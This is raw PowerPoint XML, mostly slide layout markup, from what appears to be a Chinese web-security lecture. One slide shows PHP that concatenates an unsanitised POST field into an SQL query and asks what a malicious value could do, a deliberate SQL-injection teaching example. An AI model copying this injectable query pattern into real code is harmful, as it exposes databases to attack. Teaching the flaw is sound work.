                  <a:off x="153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68" name="Line 36"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="172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69" name="Line 37"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="192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70" name="Line 38"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="211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71" name="Line 39"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="230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72" name="Line 40"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="249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73" name="Line 41"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="268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74" name="Line 42"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="288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75" name="Line 43"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="307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76" name="Line 44"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="326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77" name="Line 45"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="345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78" name="Line 46"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="364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79" name="Line 47"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="384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80" name="Line 48"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="403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81" name="Line 49"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="422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82" name="Line 50"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="441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83" name="Line 51"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="460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84" name="Line 52"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="480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85" name="Line 53"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="49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86" name="Line 54"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="51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87" name="Line 55"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="53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sp>
              <p:nvSpPr>
                <p:cNvPr id="1068088" name="Line 56"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeShapeType="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="white">
                <a:xfrm>
                  <a:off x="55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solidFill>
                      <a:srgbClr val="40458C"/>
                    </a:solidFill>
                  </a:endParaRPr>
                </a:p>
              </p:txBody>
            </p:sp>
          </p:grpSp>
        </p:grpSp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068089" name="Rectangle 57" descr="60%"/>
            <p:cNvSpPr>
              <a:spLocks noChangeArrowheads="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="2112" y="0"/>
              <a:ext cx="3648" cy="96"/>
            </a:xfrm>
            <a:prstGeom prst="rect">
              <a:avLst/>
            </a:prstGeom>
            <a:pattFill prst="pct60">
              <a:fgClr>
                <a:schemeClr val="folHlink"/>
              </a:fgClr>
              <a:bgClr>
                <a:schemeClr val="bg1"/>
              </a:bgClr>
            </a:pattFill>
            <a:ln w="9525">
              <a:noFill/>
              <a:miter lim="800000"/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="1068090" name="Line 58"/>
            <p:cNvSpPr>
              <a:spLocks noChangeShapeType="1"/>
            </p:cNvSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvSpPr>
          <p:spPr bwMode="ltGray">
            <a:xfrm>
              <a:off x="5568" y="0"/>
              <a:ext cx="0" cy="1488"/>
            </a:xfrm>
            <a:prstGeom prst="line">
              <a:avLst/>
            </a:prstGeom>
            <a:noFill/>
            <a:ln w="9525">
              <a:solidFill>
                <a:schemeClr val="hlink"/>
              </a:solidFill>
              <a:round/>
              <a:headEnd/>
              <a:tailEnd/>
            </a:ln>
            <a:effectLst/>
          </p:spPr>
          <p:txBody>
            <a:bodyPr wrap="none" anchor="ctr"/>
            <a:lstStyle/>
            <a:p>
              <a:pPr>
                <a:defRPr/>
              </a:pPr>
              <a:endParaRPr lang="en-US">
                <a:solidFill>
                  <a:srgbClr val="40458C"/>
                </a:solidFill>
              </a:endParaRPr>
            </a:p>
          </p:txBody>
        </p:sp>
        <p:grpSp>
          <p:nvGrpSpPr>
            <p:cNvPr id="6" name="Group 59"/>
            <p:cNvGrpSpPr>
              <a:grpSpLocks/>
            </p:cNvGrpSpPr>
            <p:nvPr userDrawn="1"/>
          </p:nvGrpSpPr>
          <p:grpSpPr bwMode="auto">
            <a:xfrm>
              <a:off x="261" y="892"/>
              <a:ext cx="1124" cy="1464"/>
              <a:chOff x="96" y="916"/>
              <a:chExt cx="2208" cy="2876"/>
            </a:xfrm>
          </p:grpSpPr>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068092" name="Line 60"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1">
                <a:off x="96" y="1038"/>
                <a:ext cx="2208" cy="0"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068093" name="Line 61"/>
              <p:cNvSpPr>
                <a:spLocks noChangeShapeType="1"/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm>
                <a:off x="336" y="920"/>
                <a:ext cx="0" cy="2872"/>
              </a:xfrm>
              <a:prstGeom prst="line">
                <a:avLst/>
              </a:prstGeom>
              <a:noFill/>
              <a:ln w="9525">
                <a:solidFill>
                  <a:schemeClr val="hlink"/>
                </a:solidFill>
                <a:round/>
                <a:headEnd/>
                <a:tailEnd/>
              </a:ln>
              <a:effectLst/>
            </p:spPr>
            <p:txBody>
              <a:bodyPr wrap="none" anchor="ctr"/>
              <a:lstStyle/>
              <a:p>
                <a:pPr>
                  <a:defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
          <p:sp>
            <p:nvSpPr>
              <p:cNvPr id="1068094" name="Arc 62"/>
              <p:cNvSpPr>
                <a:spLocks/>
              </p:cNvSpPr>
              <p:nvPr userDrawn="1"/>
            </p:nvSpPr>
            <p:spPr bwMode="ltGray">
              <a:xfrm flipH="1">
                <a:off x="218" y="916"/>
                <a:ext cx="238" cy="240"/>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defRPr/>
                </a:pPr>
                <a:endParaRPr lang="en-US">
                  <a:solidFill>
                    <a:srgbClr val="40458C"/>
                  </a:solidFill>
                </a:endParaRPr>
              </a:p>
            </p:txBody>
          </p:sp>
        </p:grpSp>
      </p:grpSp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3075" name="Rectangle 63"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="609600" y="304800"/>
            <a:ext cx="7772400" cy="914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GB"/>
              <a:t>Click to edit Master title style</a:t>
            </a:r>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="3076" name="Rectangle 64" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="body" idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr bwMode="auto">
          <a:xfrm>
            <a:off x="685800" y="1600200"/>
            <a:ext cx="777240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Lst>
  <p:hf sldNum="0"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Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl3pPr>
      <a:lvl4pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl4pPr>
      <a:lvl5pPr algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl5pPr>
      <a:lvl6pPr marL="457200" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl6pPr>
      <a:lvl7pPr marL="914400" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl7pPr>
      <a:lvl8pPr marL="1371600" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="4000">
          <a:solidFill>
            <a:schemeClr val="tx2"/>
          </a:solidFill>
          <a:latin typeface="Tahoma" pitchFamily="34" charset="0"/>
        </a:defRPr>
      </a:lvl8pPr>
      <a:lvl9pPr marL="1828800" algn="l" rtl="0" fontAlgn="base">
        <a:spcBef>
          <a:spcPct val="0"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:defRPr sz="40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hlink"/>
        </a:buClr>
        <a:buSzPct val="110000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buBlip>
          <a:blip r:embed="rId15"/>
        </a:buBlip>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itchFamily="2" charset="2"/>
        <a:buChar char="n"/>
        <a:defRPr sz="2400">
          <a:solidFill>
            <a:schemeClr val="tx1"/>
          </a:solidFill>
          <a:latin typeface="+mn-lt"/>
        </a:defRPr>
      </a:lvl2pPr>
      <a:lvl3pPr marL="1143000" indent="-228600" algn="l" rtl="0" eaLnBrk="0" fontAlgn="base" hangingPunct="0">
        <a:spcBef>
          <a:spcPct val="20000"/>
        </a:spcBef>
        <a:spcAft>
          <a:spcPct val="0"/>
        </a:spcAft>
        <a:buClr>
          <a:schemeClr val="hlink"/>
        </a:buClr>
        <a:buSzPct val="95000"/>
        <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
        <a:buChar char="w"/>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6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6.xml"/><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cvedetails.com/vulnerability-list/vendor_id-2337/opsqli-1/Wordpress.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8.jpeg"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image7.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24.emf"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide4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30.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.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4.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.jpeg"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide57.xml.rels><?xml version="1.0" encoding="UTF-8" standalone="yes"?>
<Relationships xmlns="http://schemas.openxmlformats.org/package/2006/relationships"><Relationship Id="rId3" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/hyperlink" Target="https://www.paypal.com/cgi-bin/webscr?cmd=_home" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide28.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout26.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image31.png"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide5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30.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.jpeg"/></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hyperlink" Target="http://www.example.com/search?input=" TargetMode="External"/><Relationship Id="rId2" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/notesSlide" Target="../notesSlides/notesSlide30.xml"/><Relationship Id="rId1" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/slideLayout" Target="../slideLayouts/slideLayout38.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide6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30.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image8.jpeg"/></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3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8.xml"/></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3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38.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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38.xml"/></Relationships>
</file>

<file path=ppt/slides/_rels/slide7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38.xml"/><Relationship Id="rId4" Type="http://schemas.openxmlformats.org/officeDocument/2006/relationships/image" Target="../media/image38.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框 3"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="4859867" y="186267"/>
            <a:ext cx="184666" cy="400110"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
          <a:noFill/>
        </p:spPr>
        <p:txBody>
          <a:bodyPr wrap="none" rtlCol="0">
            <a:spAutoFit/>
          </a:bodyPr>
          <a:lstStyle/>
          <a:p>
            <a:endParaRPr kumimoji="1" lang="zh-CN" altLang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="13" name="标题 2"/>
          <p:cNvSpPr txBox="1"/>
          <p:nvPr/>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="1828800" y="1981200"/>
            <a:ext cx="5497554" cy="1470025"/>
          </a:xfrm>
          <a:prstGeom prst="rect">
            <a:avLst/>
          </a:prstGeom>
        </p:spPr>
        <p:txBody>
          <a:bodyPr vert="horz" lIns="91440" tIns="45720" rIns="91440" bIns="45720" rtlCol="0" anchor="ctr">
            <a:no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zh-CN" altLang="en-US" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>第</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>4</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" b="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>讲</a:t>
            </a:r>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:br>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" b="0" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
            </a:br>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>Web</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="3600" dirty="0">
                <a:solidFill>
                  <a:schemeClr val="bg2">
                    <a:lumMod val="10000"/>
                  </a:schemeClr>
                </a:solidFill>
                <a:latin typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
                <a:ea typeface="微软雅黑" panose="020B0503020204020204" pitchFamily="34" charset="-122"/>
              </a:rPr>
              <a:t>安全</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" altLang="zh-CN" sz="3600"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84801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81378" name="Rectangle 2"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="609600" y="609600"/>
            <a:ext cx="7772400" cy="620110"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>使用</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" dirty="0"/>
              <a:t>进行数据库查询</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" dirty="0"/>
          </a:p>
        </p:txBody>
      </p:sp>
      <p:sp>
        <p:nvSpPr>
          <p:cNvPr id="1381379" name="Rectangle 3" descr="Rectangle: Click to edit Master text styles&#10;Second level&#10;Third level&#10;Fourth level&#10;Fifth level"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1" noChangeArrowheads="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph idx="1"/>
          </p:nvPr>
        </p:nvSpPr>
        <p:spPr>
          <a:xfrm>
            <a:off x="571500" y="1600200"/>
            <a:ext cx="8001000" cy="4419600"/>
          </a:xfrm>
        </p:spPr>
        <p:txBody>
          <a:bodyPr/>
          <a:lstStyle/>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>简单的</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" sz="2800" dirty="0"/>
              <a:t>PHP</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0"/>
              <a:t>	</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>$recipient = $_POST[‘recipient’];  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = "SELECT </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>PersonID</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> FROM Person WHERE 	Username='$recipient'";  </a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" pitchFamily="2" charset="2"/>
              <a:buNone/>
            </a:pPr>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>	$</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>rs</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t> = $db-&gt;</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>executeQuery</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>($</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0" err="1">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>sql</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>);</a:t>
            </a:r>
          </a:p>
          <a:p>
            <a:pPr>
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
              <a:buFont typeface="Wingdings" panose="05000000000000000000" pitchFamily="2" charset="2"/>
              <a:buChar char="ü"/>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>问题</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2800" dirty="0"/>
          </a:p>
          <a:p>
            <a:pPr lvl="1">
              <a:lnSpc>
                <a:spcPct val="125000"/>
              </a:lnSpc>
            </a:pPr>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>如果</a:t>
            </a:r>
            <a:r>
              <a:rPr lang="en-US" altLang="zh-CN" sz="2800" dirty="0">
                <a:solidFill>
                  <a:srgbClr val="009900"/>
                </a:solidFill>
              </a:rPr>
              <a:t>‘recipient’ </a:t>
            </a:r>
            <a:r>
              <a:rPr lang="zh-CN" altLang="en-US" sz="2800" dirty="0"/>
              <a:t>是能改变查询语义的恶意的字符串呢？</a:t>
            </a:r>
            <a:endParaRPr lang="en-US" sz="2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Title 4"/>
          <p:cNvSpPr>
            <a:spLocks noGrp="1"/>
          </p:cNvSpPr>
          <p:nvPr>
            <p:ph type="title"/>
          </p:nvPr>
